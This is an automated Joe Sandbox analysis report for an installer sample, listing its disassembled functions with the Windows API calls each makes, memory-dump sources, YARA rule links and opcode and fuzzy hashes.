                                      • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                      • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                      • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                      • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                      Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                      • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                      • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                      Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                      • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                      • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                      Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                      • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                      • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                      Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString
                                      • String ID:
                                      • API String ID: 1096422788-0
                                      • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                      • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                      • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                      • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                      Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,: Completed,?), ref: 004060DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                      • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                      • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                      Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                      • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                      • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                      • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                      Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                      • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                      • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                      • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                      Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                      • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                      • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                      • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                      Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                      Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                      • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                      • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                      • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                      Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                        • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                        • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                        • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                        • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                        • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                        • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                        • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 2972824698-0
                                      • Opcode ID: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                      • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                      • Opcode Fuzzy Hash: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                      • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

                                      Non-executed Functions

                                      Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                      • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                      • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                      • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                      • DeleteObject.GDI32(00000000), ref: 00404D22
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                      • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
